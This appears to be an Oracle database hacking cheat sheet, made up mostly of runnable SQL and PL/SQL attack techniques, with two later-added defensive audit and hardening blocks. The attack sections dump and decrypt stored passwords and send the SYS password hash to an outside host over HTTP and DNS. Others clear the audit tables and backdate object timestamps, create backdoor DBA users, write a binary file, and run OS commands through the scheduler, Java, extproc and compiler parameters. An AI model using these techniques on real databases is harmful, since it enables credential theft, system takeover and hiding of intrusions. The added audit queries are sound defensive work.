Oracle Study Notes

Information Retrieval:
Get Version:

select * from v$version 
-- all users

Get Security Patchlevel:

select * from dba_registry_history; 
-- only DBA, 9i+, empty or non-existent table = no Security Patch

Installed Database Components:

select * from dba_registry; 
-- only DBA

Get Userlist:

select * from all_users; 
-- only DBA

Get User & Passwords Hashes:

select username,password,account_status from dba_users; 
-- only DBA until 10g R2

Get Apex Password Hashes:

select user_name, web_password_raw from flows_030000.wwv_flow_fnd_user; 
-- only DBA, 030000 = APEX version 3.0, 020100=2.1

Decrypt Apex Password Hashes:

select user_name, 
utl_http.request('http://md5.rednoize.com/?q='||web_password_raw||'&b=MD5-Search') 
-- only DBA, requires internet access from the database
from flows_030000.wwv_flow_fnd_user;

Get Metalink account/password:

select sysman.decrypt(aru_username), sysman.decrypt(aru_password) 
-- only DBA, 10g – 11g

Get Password of mgmt_view_user

select view_username, sysman.decrypt(view_password) 
from sysman.mgmt_view_user_credentials; 
-- only DBA, 10g – 11g

Get Passwords of DB/Grid Control:

select credential_set_column, sysman.decrypt(credential_value) 
from sysman.mgmt_credentials2; 
-- only DBA, 10g – 11g

TDE Encrypted Tables:

select table_name,column_name,encryption_alg,salt 
from dba_encrypted_columns; 
-- only DBA, 10g – 11g

Already DBA?

desc dba_users 
-- only possible if DBA (or select any dictionary)

Get System Privileges:

select * from user_sys_privs; 
-- show system privileges of the current user

Get Role Privileges:

select * from user_role_privs; 
-- show role privileges of the current user

Get Table Privileges:

select * from user_tab_privs; 
-- show table privileges of the current user

Get interesting tables:

select table_name, column_name, owner
  from dba_tab_columns
 where upper(column_name) like '%PWD%'
    or upper(column_name) like '%PASSW%'
    or upper(column_name) like '%CREDEN%'
    or upper(column_name) like '%AUTH%';
-- show tables with columns containing the string 'PWD', ...

Get a list of all Oracle directories:

select * from dba_directories; 
-- show Oracle directories

Show Values of audit parameter:

show parameter audit 
-- show all parameters of audit

Show Values of utl parameter:

show parameter utl 
-- show all parameters of utl (e.g. *)

Access SQL History (v$sql):

select sql_text
  from sys.v$sql
 where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http

Access SQL History (wrh$_sqltext):

select sql_text
  from sys.wrh$_sqltext
 where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http
 

Web Access:
Web access via utl_http:

select utl_http.request('http://www.orasploit.com/utl_http') from dual;
-- all users, 8-10g R2

Web access via httpuritype:

select httpuritype( 'http://www.orasploit.com/httpuritype' ).getclob() from dual; 
-- all users, 8-10g R2

Send password hash to webserver:

select utl_http.request('http://www.orasploit.com/' ||
                        (select username || '=' || password
                           from dba_users
                         -- only DBA, change value of username for other users
                          where username = 'SYS'))
  from dual;

Send password hash to webserver:

select httpuritype('http://www.orasploit.com/' ||
                   (select username || '=' || password
                      from dba_users
                    -- only DBA, change value of username for other users
                     where username = 'SYS')) .getclob()
  from dual;

Send password hash via DNS:

select utl_http.request('http://www.' ||
                        (select username || '=' || password
                           from dba_users
                         -- only DBA, change value of username for other users
                          where username = 'SYS') || '.orasploit.com/')
  from dual;
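
The `all users` note on `utl_http` and `httpuritype` above holds because `EXECUTE` on both is granted to `PUBLIC` by default. The following check and hardening steps are an added example, not part of the original cheat sheet; `UTL_TCP`, `UTL_SMTP` and `UTL_INADDR` are included as an extension beyond the two objects shown on this page, and `app_owner` is a hypothetical schema name.

```sql
-- Added example, not from the original cheat sheet. Run as a DBA.

-- 1. Who can execute the network-capable packages and types?
--    A row with grantee = 'PUBLIC' means every database account can call it.
select grantee, owner, table_name, privilege
  from dba_tab_privs
 where privilege = 'EXECUTE'
   and owner = 'SYS'
   and table_name in ('UTL_HTTP', 'HTTPURITYPE', 'UTL_TCP',
                      'UTL_SMTP', 'UTL_INADDR')
 order by table_name, grantee;

-- 2. Which application objects depend on them? Review this list before
--    revoking, because dependent objects lose access through PUBLIC.
select owner, name, type, referenced_name
  from dba_dependencies
 where referenced_owner = 'SYS'
   and referenced_name in ('UTL_HTTP', 'HTTPURITYPE', 'UTL_TCP',
                           'UTL_SMTP', 'UTL_INADDR')
   and owner not in ('SYS', 'PUBLIC')
 order by referenced_name, owner, name;

-- 3. Remove the blanket grant, then re-grant only to schemas that need it.
revoke execute on sys.utl_http from public;
revoke execute on sys.httpuritype from public;
-- grant execute on sys.utl_http to app_owner;  -- app_owner: hypothetical schema
```

With the `PUBLIC` grant removed, the page's own `v$sql` search for `utl_http` becomes a useful alert source, since legitimate callers are then a short, known list.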

 

Change Oracle Passwords:

With SQL*Plus Password cmd:

password system; 
-- Password not sent in cleartext

With Alter user cmd:

alter user system identified by rds2007; 
-- Password sent in cleartext over the network

With Alter user cmd:

alter user system identified by values '737B466C2DF536B9'; 
-- Set a password hash directly

With grant:

grant connect to system identified by rds2007; 
-- Password sent in cleartext over the network

With update:

update sys.user$ set password = '737B466C2DF536B9' where name='SYSTEM'; 
-- Password sent in cleartext over the network, DB restart necessary

 

Useful Tools / Links:
checkpwd: http://www.red-database-security.com/software/checkpwd.html -- fastest Oracle dictionary password cracker
orabf: http://www.toolcrypt.org/tools/orabf/index.html -- fastest Oracle Brute Force cracker
Tnscmd: http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd -- control unprotected TNS Listener without Oracle Client
sidguess: http://www.red-database-security.com/software/sidguess.zip -- fastest Oracle dictionary password cracker
Oracle Assessment Kit: http://www.databasesecurity.com/dbsec/OAK.zip -- useful tools, e.g. to exploit the alter session bug
Oracle Instant Client: http://www.oracle.com/technology/software/tech/oci/instantclient/index.html -- Oracle Instant Client
Oracle SQL Developer: http://www.oracle.com/technology/software/products/sql/index.html -- GUI Tool for Oracle in Java


Anti-Forensics:
Clear v$sql:

alter system flush shared_pool; 
-- only DBA, all versions

Clear sys.wrh$_sqlstat:

truncate table sys.wrh$_sqlstat; 
-- only DBA, 10g/11g

Clear audit-Table:

truncate table sys.aud$; 
-- only as SYS, all versions

Clear audit-Table:

delete from sys.aud$; 
-- all users, all versions

Change Object Creation Date:

update sys.obj$
   set ctime = sysdate - 300, mtime = sysdate - 300, stime = sysdate - 300
 where name = 'AUD$'; 
-- change the creation date of an object

 

Create Oracle User:

With create user cmd:

create user user1 identified by rds2007; 
grant dba to user1;
-- Password sent in cleartext over the network

With grant:

grant dba to user1 identified by rds2007; 
-- Privilege granted, User will be created if not existing

With grant:

grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4; 
-- Password sent in cleartext over the network

 
Run OS Commands via dbms_scheduler: (10g/11g only)

-- Create a Program for dbms_scheduler
exec DBMS_SCHEDULER.create_program('RDS2007','EXECUTABLE','c:\WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
-- Create, execute and delete a Job for dbms_scheduler
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2007JOB',program_name => 'RDS2007',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);
-- delete the program
exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME => 'RDS2007');
-- Purge the logfile for dbms_scheduler
--exec DBMS_SCHEDULER.PURGE_LOG;

 

Hacking Oracle - www.red-database-security.com - Version 1.3 - 2-Sep-2007

Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\';
DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767);
BEGIN
bu:=hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083
C402CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC
3558BEC8B5E088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F
2C20576F726C64210D0A');
fi:=UTL_FILE.fopen('EXT','rds2007.com','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/

Write Text Files via dbms_advisor: (10g/11g, requires the privilege advisor)

Create or replace directory EXT as 'C:\';
grant advisor to user1;
exec dbms_advisor.create_file ( 'hacked', 'EXT', 'rds2.txt' )

Write Text Files via utl_file:
Create or replace directory EXT as 'C:\';
DECLARE
   v_file UTL_FILE.FILE_TYPE;
BEGIN 
v_file := UTL_FILE.FOPEN('C:\','rds1.txt', 'w');
   UTL_FILE.PUT_LINE(v_file,'first row');
   UTL_FILE.NEW_LINE (v_file);
   UTL_FILE.PUT_LINE(v_file,'second row');
   UTL_FILE.FCLOSE(v_file);
END;

Read Files via Java:

grant javasyspriv to user1;
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS
import java.lang.*;
import java.io.*;
public class JAVAREADFILE{
public static void readfile(String filename) throws IOException{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while(text != null){
System.out.println(text);
text = fr.readLine(); }
fr.close();        }
};
CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename IN
VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVAREADFILE.readfile (java.lang.String)';
/
set serveroutput on size 100000
exec dbms_java.set_output(2000);
exec JAVAREADFILEPROC('C:\boot.ini')

Run OS Commands via Java: (requires Java in the Database)

grant javasyspriv to user1;
create or replace and resolve java source named "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException {
     Runtime.getRuntime().exec(command);} };
/
Create or replace procedure javacmdproc (p_command in varchar2)
as language java
name 'JAVACMD.execCommand (java.lang.String)';
/
exec javacmdproc('cmd.exe /c echo 0wned > c:\rds4.txt');

Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)

alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds6.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/

Run OS Commands via Extproc

-- Since 9i extproc can only run DLLs from the Oracle_Home-Bin directory
-- copy the msvcrt.dll to this directory before executing this code
Grant create any library to user1;
--Windows
Create or replace library exec_shell AS 'C:\oracle\ora102\bin\msvcrt.dll';
--Linux
create or replace library systemcalls is '/lib/libc.so';
Create or replace package oracmd is procedure exec(cmdstring IN CHAR); end oracmd;
/
Create or replace package body oracmd IS
procedure exec(cmdstring IN CHAR)
is external   NAME "system"
library exec_shell   LANGUAGE C;
end oracmd;
/
exec oracmd.exec('cmd.exe /c echo 0wned > c:\rds7.txt');

Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)

alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds5.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/
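
The file-access and OS-command sections above all depend on a specific privilege, role, directory, library or parameter being in place, and a DBA can audit for each of them. This audit is an added example, not part of the original cheat sheet. It uses only standard dictionary views, the exclusion lists of built-in grantees are an assumption to adjust per installation, and `CREATE ANY DIRECTORY` and `CREATE EXTERNAL JOB` are included although the page does not name them.

```sql
-- Added example, not from the original cheat sheet. Run as a DBA.

-- 1. System privileges behind the library, directory, advisor and
--    ALTER SYSTEM techniques
select grantee, privilege, admin_option
  from dba_sys_privs
 where privilege in ('CREATE ANY LIBRARY', 'CREATE LIBRARY',
                     'CREATE ANY DIRECTORY', 'CREATE EXTERNAL JOB',
                     'ALTER SYSTEM', 'ADVISOR')
   and grantee not in ('SYS', 'SYSTEM', 'DBA')  -- assumed baseline, adjust
 order by privilege, grantee;

-- 2. Holders of the DBA and JAVASYSPRIV roles
select grantee, granted_role, admin_option
  from dba_role_privs
 where granted_role in ('DBA', 'JAVASYSPRIV')
   and grantee not in ('SYS', 'SYSTEM')          -- assumed baseline, adjust
 order by granted_role, grantee;

-- 3. Directory objects that expose a filesystem root such as / or C:\
select owner, directory_name, directory_path
  from dba_directories
 where directory_path in ('/', '\')
    or directory_path like '_:\'
    or directory_path like '_:';

-- 4. External libraries mapped onto the C runtime, where system() lives
select owner, library_name, file_spec, status
  from dba_libraries
 where lower(file_spec) like '%msvcrt%'
    or lower(file_spec) like '%libc.%';

-- 5. Scheduler programs that launch an OS executable
select owner, program_name, program_action, enabled
  from dba_scheduler_programs
 where program_type = 'EXECUTABLE';

-- 6. Java sources outside the built-in schemas
select owner, object_name, created, last_ddl_time
  from dba_objects
 where object_type = 'JAVA SOURCE'
   and owner not in ('SYS', 'SYSTEM');           -- assumed baseline, adjust

-- 7. 9i only: expect no row, NULL, or the genuine make utility path
select name, value
  from v$parameter
 where name = 'plsql_native_make_utility';
```

Because the scheduler example on this page drops its program and auto-drops its job, query 5 only catches objects that still exist; a baseline of expected rows for each query makes later differences easy to spot.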
 

 
